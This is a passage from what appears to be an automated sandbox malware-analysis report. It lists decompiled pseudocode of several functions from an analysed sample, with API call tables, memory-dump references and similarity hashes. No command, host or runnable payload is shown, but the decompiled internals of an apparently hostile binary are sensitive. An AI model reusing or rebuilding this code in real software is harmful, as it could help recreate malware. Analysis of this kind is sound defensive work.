                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Trim
                            • String ID:
                            • API String ID: 3043112668-0
                            • Opcode ID: 275cb0ea83611004f260249d647cc8cfa56a59874a4b9d3504023c999e7f81d1
                            • Instruction ID: ea7efdf7620249f32e20b956761da975925ed4935a514d1bd1a3317a60dddb0d
                            • Opcode Fuzzy Hash: 275cb0ea83611004f260249d647cc8cfa56a59874a4b9d3504023c999e7f81d1
                            • Instruction Fuzzy Hash: 86019A71A04346ABEB204B6A8C88BA77B8EEB95340F445023AB41CB392DA30CC428260
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D5854 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48COMMON
                            Download Yara Rule
                            C-Code - Quality: 64%
                            			E006D5854(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E006D5E6F(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x6da348; // 0xdcd5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x6db4e0; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x6db904; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E006D2058();
					_push( &_v64);
					if( *0x6da100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E006D2058();
				}
				return _t28;
			}















                            0x006d5854
                            0x006d585b
                            0x006d5864
                            0x006d5869
                            0x006d586d
                            0x006d5877
                            0x006d587c
                            0x006d5881
                            0x006d5886
                            0x006d5890
                            0x006d589a
                            0x006d589a
                            0x006d5892
                            0x006d5892
                            0x006d5892
                            0x006d5892
                            0x006d58a0
                            0x006d58a6
                            0x006d58a7
                            0x006d58aa
                            0x006d58ad
                            0x006d58b0
                            0x006d58b8
                            0x006d58c1
                            0x006d58c9
                            0x006d58c9
                            0x006d58cb
                            0x006d58cd
                            0x006d58cd
                            0x006d58d7

                            APIs
                              • Part of subcall function 006D5E6F: SysAllocString.OLEAUT32(00000000), ref: 006D5EC9
                              • Part of subcall function 006D5E6F: SysAllocString.OLEAUT32(0070006F), ref: 006D5EDD
                              • Part of subcall function 006D5E6F: SysAllocString.OLEAUT32(00000000), ref: 006D5EEF
                            • memset.NTDLL ref: 006D5877
                            • GetLastError.KERNEL32 ref: 006D58C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocString$ErrorLastmemset
                            • String ID: <
                            • API String ID: 3736384471-4251816714
                            • Opcode ID: c5c47e507a62a44808fee3d1dcf1e61b1e2fff4e8e862e3749f14e1896ad57c3
                            • Instruction ID: 4c18e2d5734201b2be0f96d0fc90e646555a6d7e83ef03d0b8fdf39df4cb2e6f
                            • Opcode Fuzzy Hash: c5c47e507a62a44808fee3d1dcf1e61b1e2fff4e8e862e3749f14e1896ad57c3
                            • Instruction Fuzzy Hash: 23014071D01628ABDB10EFA5DC85EEEBBFAAB08740F41402BF905E7351D7709905CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D2554 Relevance: 3.8, APIs: 3, Instructions: 81COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E006D2554(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E006D7A71(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x6da374, 0x110);
					_t27 =  *0x6da378; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E006D606D(0x110, _a4, _t27, 0);
					}
					if(E006D5E3C( &_v36) != 0) {
						_t35 = E006D47E5(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E006D1DBC(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							memset(_t55, 0, _v12 - (_t46[4] & 0xf));
							_t57 = _t57 + 0xc;
							E006D789E(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E006D789E(_a4);
				}
				return _v16;
			}
















                            0x006d255a
                            0x006d255f
                            0x006d256c
                            0x006d256f
                            0x006d2572
                            0x006d2577
                            0x006d257c
                            0x006d258a
                            0x006d258f
                            0x006d2594
                            0x006d2599
                            0x006d259b
                            0x006d25a3
                            0x006d25a3
                            0x006d25b2
                            0x006d25c7
                            0x006d25ce
                            0x006d25d5
                            0x006d25db
                            0x006d25e1
                            0x006d25e9
                            0x006d25ef
                            0x006d25ff
                            0x006d2604
                            0x006d2608
                            0x006d2608
                            0x006d25ce
                            0x006d2613
                            0x006d261e
                            0x006d261e
                            0x006d262a

                            APIs
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,006D654A,?), ref: 006D258A
                            • memset.NTDLL ref: 006D25FF
                            • memset.NTDLL ref: 006D2613
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: memset$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 1529149438-0
                            • Opcode ID: c8607349459e04db9f99677a2dfd980e362edf1f4824d09f109afc5bdd104cf6
                            • Instruction ID: 6f7e3d4fa816adf39e2f869c70fbecadf20ee17a26f40ca5199326e68c6908e0
                            • Opcode Fuzzy Hash: c8607349459e04db9f99677a2dfd980e362edf1f4824d09f109afc5bdd104cf6
                            • Instruction Fuzzy Hash: FC214175D00219BBDB51AFA5CC51FEE7BBAAF15740F04402AF904EA351E734DA00CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D58F8 Relevance: 3.1, APIs: 2, Instructions: 149serviceCOMMON
                            Download Yara Rule
                            C-Code - Quality: 38%
                            			E006D58F8(intOrPtr _a4) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				short _t73;
				intOrPtr* _t74;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t82;
				char* _t98;
				intOrPtr _t100;
				void* _t106;
				void* _t108;
				intOrPtr _t112;

				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x6da348; // 0xdcd5a8
				_t4 = _t49 + 0x6db448; // 0x14a89f0
				_t82 = 0;
				_t5 = _t49 + 0x6db438; // 0x9ba05972
				_t51 =  *0x6da170(_t5, 0, 4, _t4,  &_v20); // executed
				_t106 = _t51;
				if(_t106 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t98 =  &_v48;
					_push(_t98);
					_push(_t98);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x6da348; // 0xdcd5a8
						_t30 = _t56 + 0x6db428; // 0x14a89d0
						_t31 = _t56 + 0x6db458; // 0x4c96be40
						_t58 =  *0x6da10c(_v12, _t31, _t30,  &_v24); // executed
						_t106 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t106 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t106 >= 0) {
							_t112 = _v16;
							if(_t112 == 0) {
								_t106 = 0x80004005;
								goto L11;
							} else {
								if(_t112 <= 0) {
									L11:
									if(_t106 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = 3;
										_v48 = _t73;
										_t74 = _v20;
										_v40 = _t82;
										_t108 = _t108 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t106 =  *((intOrPtr*)( *_t74 + 0x20))(_t74,  &_v12);
										if(_t106 < 0) {
											goto L7;
										} else {
											_t77 =  *0x6da348; // 0xdcd5a8
											_t23 = _t77 + 0x6db428; // 0x14a89d0
											_t24 = _t77 + 0x6db458; // 0x4c96be40
											_t106 =  *0x6da10c(_v12, _t24, _t23,  &_v24);
											_t80 = _v12;
											 *((intOrPtr*)( *_t80 + 8))(_t80);
											if(_t106 >= 0) {
												L12:
												_t63 = _v24;
												_t106 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t106 >= 0) {
													_t100 =  *0x6da348; // 0xdcd5a8
													_t67 = _v28;
													_t40 = _t100 + 0x6db418; // 0x214e3
													_t106 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t82 = _t82 + 1;
									} while (_t82 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t106;
			}


































                            0x006d5903
                            0x006d590a
                            0x006d590b
                            0x006d590c
                            0x006d590d
                            0x006d5913
                            0x006d5918
                            0x006d5921
                            0x006d5924
                            0x006d592b
                            0x006d5931
                            0x006d5935
                            0x006d593b
                            0x006d5943
                            0x006d5944
                            0x006d5949
                            0x006d594a
                            0x006d594c
                            0x006d594f
                            0x006d5950
                            0x006d5951
                            0x006d5957
                            0x006d59ed
                            0x006d59f2
                            0x006d59f9
                            0x006d5a03
                            0x006d5a09
                            0x006d5a0b
                            0x006d5a11
                            0x00000000
                            0x006d595d
                            0x006d595d
                            0x006d5964
                            0x006d596d
                            0x006d5971
                            0x006d5977
                            0x006d597a
                            0x006d59e2
                            0x00000000
                            0x006d597c
                            0x006d597c
                            0x006d5a14
                            0x006d5a16
                            0x00000000
                            0x00000000
                            0x006d5982
                            0x006d5982
                            0x006d5984
                            0x006d5989
                            0x006d598d
                            0x006d5990
                            0x006d5995
                            0x006d599d
                            0x006d599e
                            0x006d599f
                            0x006d59a1
                            0x006d59a5
                            0x006d59a9
                            0x00000000
                            0x006d59ab
                            0x006d59af
                            0x006d59b4
                            0x006d59bb
                            0x006d59cb
                            0x006d59cd
                            0x006d59d3
                            0x006d59d8
                            0x006d5a18
                            0x006d5a18
                            0x006d5a25
                            0x006d5a29
                            0x006d5a2e
                            0x006d5a34
                            0x006d5a39
                            0x006d5a43
                            0x006d5a45
                            0x006d5a4b
                            0x006d5a4b
                            0x006d5a4e
                            0x006d5a54
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d59d8
                            0x00000000
                            0x006d59da
                            0x006d59da
                            0x006d59db
                            0x00000000
                            0x006d59e0
                            0x006d597c
                            0x006d597a
                            0x006d5971
                            0x006d5a57
                            0x006d5a57
                            0x006d5a5d
                            0x006d5a5d
                            0x006d5a66

                            APIs
                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,014A89D0,006D5E9D,?,?,?,?,?,?,?,?,?,?,?,006D5E9D), ref: 006D59C5
                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,014A89D0,006D5E9D,?,?,?,?,?,?,?,006D5E9D,00000000,00000000,00000000,006D0063), ref: 006D5A03
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: QueryServiceUnknown_
                            • String ID:
                            • API String ID: 2042360610-0
                            • Opcode ID: 0faf5a50f2ebdfd4a482953f67cb556db42497e50b88b5846fb331e9e3d1d56c
                            • Instruction ID: 9ef0a8896d9d8f2abd534a4427541e099190619bd7194c9ac805da195429bdb5
                            • Opcode Fuzzy Hash: 0faf5a50f2ebdfd4a482953f67cb556db42497e50b88b5846fb331e9e3d1d56c
                            • Instruction Fuzzy Hash: D9512A75D00619EFCB40CFE8C888DAEB7BAFF48710B05459AE906EB354D731A945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D4BD5 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E006D4BD5(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E006D2689(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x6da348; // 0xdcd5a8
						_t20 = _t68 + 0x6db1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E006D1061(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                            0x006d4bdb
                            0x006d4bde
                            0x006d4bee
                            0x006d4bf7
                            0x006d4bfb
                            0x006d4cc9
                            0x006d4ccf
                            0x006d4ccf
                            0x006d4c15
                            0x006d4c1a
                            0x006d4c1e
                            0x006d4c24
                            0x006d4c29
                            0x006d4c30
                            0x006d4c3f
                            0x006d4c3f
                            0x006d4c43
                            0x006d4c45
                            0x006d4c51
                            0x006d4c5c
                            0x006d4c67
                            0x006d4c6b
                            0x006d4c75
                            0x006d4c79
                            0x006d4c7b
                            0x006d4c80
                            0x006d4c87
                            0x006d4c97
                            0x006d4c97
                            0x006d4c80
                            0x006d4c79
                            0x006d4c99
                            0x006d4c9e
                            0x006d4ca3
                            0x006d4ca3
                            0x006d4ca6
                            0x006d4caf
                            0x006d4cb4
                            0x006d4cb4
                            0x006d4cb9
                            0x006d4cbe
                            0x006d4cbe
                            0x006d4cb9
                            0x006d4c43
                            0x006d4cc0
                            0x006d4cc6
                            0x00000000

                            APIs
                              • Part of subcall function 006D2689: SysAllocString.OLEAUT32(80000002), ref: 006D26E6
                              • Part of subcall function 006D2689: SysFreeString.OLEAUT32(00000000), ref: 006D274C
                            • SysFreeString.OLEAUT32(?), ref: 006D4CB4
                            • SysFreeString.OLEAUT32(006D23DF), ref: 006D4CBE
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: String$Free$Alloc
                            • String ID:
                            • API String ID: 986138563-0
                            • Opcode ID: dd5718fd7e42880ee3f05bdfb8cf7e96861ee2fba4ff264a240a30457a13d607
                            • Instruction ID: b952ea37cf0a8f505018780fbe6f872032012f8a1eb5c4a70978401fb957de9f
                            • Opcode Fuzzy Hash: dd5718fd7e42880ee3f05bdfb8cf7e96861ee2fba4ff264a240a30457a13d607
                            • Instruction Fuzzy Hash: 21310872910119EFCB11DFA5D888C9BBB7AFFC97407154A5AF8059B310DA32AD91CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D5A69 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E006D5A69(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x6da348; // 0xdcd5a8
				_t2 = _t42 + 0x6db468; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x6da348; // 0xdcd5a8
					_t6 = _t45 + 0x6db488; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x6da348; // 0xdcd5a8
							_t30 = _v8;
							_t12 = _t48 + 0x6db478; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                            0x006d5a75
                            0x006d5a76
                            0x006d5a7c
                            0x006d5a83
                            0x006d5a85
                            0x006d5a89
                            0x006d5a8d
                            0x006d5a8f
                            0x006d5a98
                            0x006d5a9e
                            0x006d5aa6
                            0x006d5aa8
                            0x006d5aac
                            0x006d5aae
                            0x006d5abb
                            0x006d5abf
                            0x006d5ac4
                            0x006d5aca
                            0x006d5acf
                            0x006d5ad7
                            0x006d5ad9
                            0x006d5adb
                            0x006d5ae1
                            0x006d5ae1
                            0x006d5ae4
                            0x006d5aea
                            0x006d5aea
                            0x006d5aed
                            0x006d5af3
                            0x006d5af3
                            0x006d5afa

                            APIs
                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 006D5AA6
                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 006D5AD7
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Interface_ProxyQueryUnknown_
                            • String ID:
                            • API String ID: 2522245112-0
                            • Opcode ID: 5422448290fac1f5a530b48a100318333bb395d81e9eb3398d3e99fafe91c8ae
                            • Instruction ID: 33a018ca652419e1bc2b48ad6b716fa2fb4d5e6342223734e9dd4b96dffbed79
                            • Opcode Fuzzy Hash: 5422448290fac1f5a530b48a100318333bb395d81e9eb3398d3e99fafe91c8ae
                            • Instruction Fuzzy Hash: DB214F75E00619EFCB00CBA4C888D9AB77AEF88704B158689E906DB365D771ED41CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004011F6 Relevance: 3.1, APIs: 2, Instructions: 60stringthreadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004011F6() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x403184;
				if( *0x40316c > 5) {
					_t16 = _t15 + 0x4040f9;
				} else {
					_t16 = _t15 + 0x4040b1;
				}
				E00401329(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E00401920( &_v32,  &_v16,  *0x403180 ^ 0xf7a71548) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x403178);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E00401A49(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t40 =  *0x403178;
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x403178 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E00401FBA(_t45, _t40, _t32 + 4);
						}
					}
					_t25 = E00401875(_v28); // executed
				}
				ExitThread(_t25);
			}















                            0x004011fc
                            0x0040120d
                            0x00401217
                            0x0040120f
                            0x0040120f
                            0x0040120f
                            0x0040121e
                            0x00401227
                            0x0040122c
                            0x0040124a
                            0x004012a7
                            0x0040124c
                            0x00401252
                            0x00401258
                            0x00401266
                            0x0040126a
                            0x00401271
                            0x00401273
                            0x00401279
                            0x0040127d
                            0x00401285
                            0x00401296
                            0x00401287
                            0x0040128d
                            0x0040128d
                            0x00401285
                            0x0040129e
                            0x0040129e
                            0x004012a9

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: ExitThreadlstrlen
                            • String ID:
                            • API String ID: 2636182767-0
                            • Opcode ID: 790b61abaedcbdc4a60141dd56dd6f5efea9b863add848607eda0236650ecbbf
                            • Instruction ID: b06575ce47738e750fa21101d439a179049e3a3f6f5bd6bf59ccf56b07c94354
                            • Opcode Fuzzy Hash: 790b61abaedcbdc4a60141dd56dd6f5efea9b863add848607eda0236650ecbbf
                            • Instruction Fuzzy Hash: B211AC71504205ABE701DBA5DD09E9777ECAB48304F05497BB601F71B0EB38E6098B59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D701C Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 006D7043
                              • Part of subcall function 006D4BD5: SysFreeString.OLEAUT32(?), ref: 006D4CB4
                            • SafeArrayDestroy.OLEAUT32(?), ref: 006D7093
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: ArraySafe$CreateDestroyFreeString
                            • String ID:
                            • API String ID: 3098518882-0
                            • Opcode ID: 6f5cce7dab91d90856763fa63a2f3184492efba08ada609e2685af238b09a077
                            • Instruction ID: ed7ddc584870d3c080f7f8e574d19341f443d035d53739d9908942cbac017856
                            • Opcode Fuzzy Hash: 6f5cce7dab91d90856763fa63a2f3184492efba08ada609e2685af238b09a077
                            • Instruction Fuzzy Hash: 68115276D00109BFDB01DFA4DC05EEEBBBAEF44310F048056FA05E7261E7719A158BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 006D5B4A Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(006D1629), ref: 006D5B63
                              • Part of subcall function 006D4BD5: SysFreeString.OLEAUT32(?), ref: 006D4CB4
                            • SysFreeString.OLEAUT32(00000000), ref: 006D5BA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: String$Free$Alloc
                            • String ID:
                            • API String ID: 986138563-0
                            • Opcode ID: a9464513263b9f74a25acf4b36a43866c0c91aba30824201772244a351de98f8
                            • Instruction ID: 035a9566b301fc10a3f90efb30368ca029c41a0c2c4c104473e7282ad297bf7b
